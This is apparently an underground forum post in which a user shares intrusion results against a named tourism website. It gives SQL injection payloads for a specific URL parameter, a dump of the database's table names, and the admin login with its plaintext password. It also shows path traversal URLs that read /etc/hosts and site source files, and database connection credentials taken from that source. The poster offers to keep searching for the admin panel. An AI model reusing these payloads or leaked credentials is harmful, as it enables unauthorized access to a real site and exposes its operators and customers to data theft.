| kacergei |
14.08.2019 09:01 |
I don't know how relevant this still is, but here is what I've managed to gather so far:
Spoiler: phpinfo();
Code:
onlytourism.com/php.php
Spoiler: sql-injection
Code:
URL: onlytourism.com/tours-details.php?type=16&id=31&arrdate=23%2F08%2F2019&adults=3&children=2
Code:
Vector:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=16&id=31' AND 2317=2317 AND 'TZhC'='TZhC&arrdate=23/08/2019&adults=3&children=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: type=16&id=31' AND SLEEP(5) AND 'RAuE'='RAuE&arrdate=23/08/2019&adults=3&children=2
---
Database tables
Code:
Database: onlytour_naddaf
[46 tables]
+-----------------------------------------+
| onlytourism_admin |
| onlytourism_adsense |
| onlytourism_banners |
| onlytourism_bannersmid |
| onlytourism_bookpackages |
| onlytourism_booktour |
| onlytourism_bookvisa |
| onlytourism_category |
| onlytourism_categorychannel |
| onlytourism_categorydir |
| onlytourism_categoryhd |
| onlytourism_categoryphoto |
| onlytourism_cms |
| onlytourism_configurations |
| onlytourism_country |
| onlytourism_countryliving |
| onlytourism_downloads |
| onlytourism_gallery |
| onlytourism_gallery_images |
| onlytourism_news |
| onlytourism_news_admin |
| onlytourism_news_maillist_subscribers |
| onlytourism_news_newsletter |
| onlytourism_news_newsletter_attachments |
| onlytourism_news_newsletter_maillist |
| onlytourism_news_newsletter_templates |
| onlytourism_news_newslettersubscriber |
| onlytourism_packages |
| onlytourism_prod_images |
| onlytourism_prod_imagesdir |
| onlytourism_prod_imageshd |
| onlytourism_prod_price |
| onlytourism_prod_pricedir |
| onlytourism_prod_pricehd |
| onlytourism_products |
| onlytourism_products_catg |
| onlytourism_products_catgdir |
| onlytourism_products_catghd |
| onlytourism_productsdir |
| onlytourism_productshd |
| onlytourism_projectcat_images |
| onlytourism_projectcategory |
| onlytourism_services |
| onlytourism_testimonials |
| onlytourism_tours |
| onlytourism_vacancies |
+-----------------------------------------+
Administrator data
Code:
Database: onlytour_naddaf
Table: onlytourism_admin
[1 entry]
+----+-------------+-------------+
| id | user | pwd |
+----+-------------+-------------+
| 1 | tourismcms | onlypass563 |
+----+-------------+-------------+
Spoiler: File download
/etc/hosts and the path to the root index.php
Code:
onlytourism.com/download_file.php?fname=../../../../etc/hosts
onlytourism.com/download_file.php?fname=../../../../home/onlytour/public_html/index.php
Files I managed to find myself (purely superficially):
Code:
/includes/analytics.php
/includes/banner-inner.php
/includes/footer.php
/includes/header.php
/includes/subscribe.php
/lib/adsense.php
/lib/application-footer.php
/lib/application-top.php
/lib/bannersmid.php
/lib/category.php
/lib/categorydir.php
/lib/categoryhd.php
/lib/class.phpmailer.php
/lib/cms.php
/lib/configurations.php
/lib/conmanager.php
/lib/connect.php
/lib/news.php
/lib/products.php
/lib/seourl.php
/pagination/pagination.class.php
/about.php
/blog.php
/booking-tour.php
/cms.php
/contact.php
/downloads.php
/download_file.php
/get-ajax.php
/holiday-packages.php
/index.php
/packages-details.php
/php.ini
/tours-details.php
/tours-search.php
/tours.php
Spoiler: Database connection data
Code excerpt
PHP:
class MySqlConnectionManager extends ConnectionManager {
    function MySqlConnectionManager() {
        $this->hostName = "localhost";
        $this->userName = "onlytour_naddaft";
        $this->passWord = "QYi8Lug4swSEr5J";
    }
    function doConnection() {
        if (!($this->conHandle = mysql_connect($this->hostName, $this->userName, $this->passWord))) {
            die("Cannot Connect to Host");
        }
    }
    function selectDatabase() {
        mysql_select_db("onlytour_naddaf", $this->conHandle);
    }
}
PS: If I find the admin panel I'll update the post; in the meantime I hope this information helps in the search.
|